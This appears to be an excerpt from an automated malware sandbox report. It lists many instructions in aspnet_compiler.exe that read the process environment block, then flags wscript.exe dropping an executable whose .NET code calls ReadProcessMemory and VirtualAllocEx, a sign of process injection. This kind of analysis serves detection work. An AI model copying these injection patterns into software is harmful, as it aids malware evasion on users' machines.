Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E4260 mov eax, dword ptr fs:[00000030h]	3_2_019E4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9B256 mov eax, dword ptr fs:[00000030h]	3_2_01A9B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9B256 mov eax, dword ptr fs:[00000030h]	3_2_01A9B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A605A7 mov eax, dword ptr fs:[00000030h]	3_2_01A605A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A605A7 mov eax, dword ptr fs:[00000030h]	3_2_01A605A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A605A7 mov eax, dword ptr fs:[00000030h]	3_2_01A605A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015A9 mov eax, dword ptr fs:[00000030h]	3_2_01A015A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015A9 mov eax, dword ptr fs:[00000030h]	3_2_01A015A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015A9 mov eax, dword ptr fs:[00000030h]	3_2_01A015A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015A9 mov eax, dword ptr fs:[00000030h]	3_2_01A015A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015A9 mov eax, dword ptr fs:[00000030h]	3_2_01A015A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0F5B0 mov eax, dword ptr fs:[00000030h]	3_2_01A0F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A045B1 mov eax, dword ptr fs:[00000030h]	3_2_01A045B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A045B1 mov eax, dword ptr fs:[00000030h]	3_2_01A045B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D758F mov eax, dword ptr fs:[00000030h]	3_2_019D758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D758F mov eax, dword ptr fs:[00000030h]	3_2_019D758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D758F mov eax, dword ptr fs:[00000030h]	3_2_019D758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9F5BE mov eax, dword ptr fs:[00000030h]	3_2_01A9F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E2582 mov eax, dword ptr fs:[00000030h]	3_2_019E2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E2582 mov ecx, dword ptr fs:[00000030h]	3_2_019E2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A735BA mov eax, dword ptr fs:[00000030h]	3_2_01A735BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A735BA mov eax, dword ptr fs:[00000030h]	3_2_01A735BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A735BA mov eax, dword ptr fs:[00000030h]	3_2_01A735BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A735BA mov eax, dword ptr fs:[00000030h]	3_2_01A735BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A14588 mov eax, dword ptr fs:[00000030h]	3_2_01A14588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6B594 mov eax, dword ptr fs:[00000030h]	3_2_01A6B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6B594 mov eax, dword ptr fs:[00000030h]	3_2_01A6B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E59C mov eax, dword ptr fs:[00000030h]	3_2_01A1E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]	3_2_01A0E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1C5ED mov eax, dword ptr fs:[00000030h]	3_2_01A1C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1C5ED mov eax, dword ptr fs:[00000030h]	3_2_01A1C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E65D0 mov eax, dword ptr fs:[00000030h]	3_2_019E65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h]	3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h]	3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h]	3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h]	3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h]	3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A015F4 mov eax, dword ptr fs:[00000030h]	3_2_01A015F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A155C0 mov eax, dword ptr fs:[00000030h]	3_2_01A155C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB55C9 mov eax, dword ptr fs:[00000030h]	3_2_01AB55C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E5CF mov eax, dword ptr fs:[00000030h]	3_2_01A1E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E5CF mov eax, dword ptr fs:[00000030h]	3_2_01A1E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1A5D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1A5D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A5D5D0 mov eax, dword ptr fs:[00000030h]	3_2_01A5D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A5D5D0 mov ecx, dword ptr fs:[00000030h]	3_2_01A5D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A095DA mov eax, dword ptr fs:[00000030h]	3_2_01A095DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB35D7 mov eax, dword ptr fs:[00000030h]	3_2_01AB35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB35D7 mov eax, dword ptr fs:[00000030h]	3_2_01AB35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB35D7 mov eax, dword ptr fs:[00000030h]	3_2_01AB35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E25E0 mov eax, dword ptr fs:[00000030h]	3_2_019E25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9B52F mov eax, dword ptr fs:[00000030h]	3_2_01A9B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h]	3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h]	3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h]	3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h]	3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h]	3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h]	3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8F525 mov eax, dword ptr fs:[00000030h]	3_2_01A8F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1D530 mov eax, dword ptr fs:[00000030h]	3_2_01A1D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1D530 mov eax, dword ptr fs:[00000030h]	3_2_01A1D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB5537 mov eax, dword ptr fs:[00000030h]	3_2_01AB5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h]	3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h]	3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h]	3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h]	3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0E53E mov eax, dword ptr fs:[00000030h]	3_2_01A0E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A17505 mov eax, dword ptr fs:[00000030h]	3_2_01A17505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A17505 mov ecx, dword ptr fs:[00000030h]	3_2_01A17505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h]	3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h]	3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h]	3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h]	3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h]	3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0535 mov eax, dword ptr fs:[00000030h]	3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h]	3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h]	3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h]	3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h]	3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h]	3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019ED534 mov eax, dword ptr fs:[00000030h]	3_2_019ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h]	3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h]	3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h]	3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h]	3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h]	3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h]	3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB4500 mov eax, dword ptr fs:[00000030h]	3_2_01AB4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1656A mov eax, dword ptr fs:[00000030h]	3_2_01A1656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1656A mov eax, dword ptr fs:[00000030h]	3_2_01A1656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1656A mov eax, dword ptr fs:[00000030h]	3_2_01A1656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E8550 mov eax, dword ptr fs:[00000030h]	3_2_019E8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E8550 mov eax, dword ptr fs:[00000030h]	3_2_019E8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1B570 mov eax, dword ptr fs:[00000030h]	3_2_01A1B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1B570 mov eax, dword ptr fs:[00000030h]	3_2_01A1B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DB562 mov eax, dword ptr fs:[00000030h]	3_2_019DB562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A134B0 mov eax, dword ptr fs:[00000030h]	3_2_01A134B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A144B0 mov ecx, dword ptr fs:[00000030h]	3_2_01A144B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6A4B0 mov eax, dword ptr fs:[00000030h]	3_2_01A6A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E9486 mov eax, dword ptr fs:[00000030h]	3_2_019E9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E9486 mov eax, dword ptr fs:[00000030h]	3_2_019E9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DB480 mov eax, dword ptr fs:[00000030h]	3_2_019DB480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E64AB mov eax, dword ptr fs:[00000030h]	3_2_019E64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A894E0 mov eax, dword ptr fs:[00000030h]	3_2_01A894E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB54DB mov eax, dword ptr fs:[00000030h]	3_2_01AB54DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E04E5 mov ecx, dword ptr fs:[00000030h]	3_2_019E04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1A430 mov eax, dword ptr fs:[00000030h]	3_2_01A1A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A18402 mov eax, dword ptr fs:[00000030h]	3_2_01A18402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A18402 mov eax, dword ptr fs:[00000030h]	3_2_01A18402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A18402 mov eax, dword ptr fs:[00000030h]	3_2_01A18402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0340D mov eax, dword ptr fs:[00000030h]	3_2_01A0340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DC427 mov eax, dword ptr fs:[00000030h]	3_2_019DC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DE420 mov eax, dword ptr fs:[00000030h]	3_2_019DE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DE420 mov eax, dword ptr fs:[00000030h]	3_2_019DE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DE420 mov eax, dword ptr fs:[00000030h]	3_2_019DE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D645D mov eax, dword ptr fs:[00000030h]	3_2_019D645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0A470 mov eax, dword ptr fs:[00000030h]	3_2_01A0A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0A470 mov eax, dword ptr fs:[00000030h]	3_2_01A0A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0A470 mov eax, dword ptr fs:[00000030h]	3_2_01A0A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB547F mov eax, dword ptr fs:[00000030h]	3_2_01AB547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h]	3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h]	3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h]	3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h]	3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h]	3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EB440 mov eax, dword ptr fs:[00000030h]	3_2_019EB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E443 mov eax, dword ptr fs:[00000030h]	3_2_01A1E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9F453 mov eax, dword ptr fs:[00000030h]	3_2_01A9F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0245A mov eax, dword ptr fs:[00000030h]	3_2_01A0245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h]	3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h]	3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h]	3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h]	3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1460 mov eax, dword ptr fs:[00000030h]	3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h]	3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h]	3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h]	3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h]	3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h]	3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FF460 mov eax, dword ptr fs:[00000030h]	3_2_019FF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h]	3_2_01A6F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h]	3_2_01A6F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h]	3_2_01A6F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6F7AF mov eax, dword ptr fs:[00000030h]	3_2_01A6F7AF

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_executable.exe.1.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: temp_executable.exe.1.dr, Program.cs	Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.1.dr, Program.cs	Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
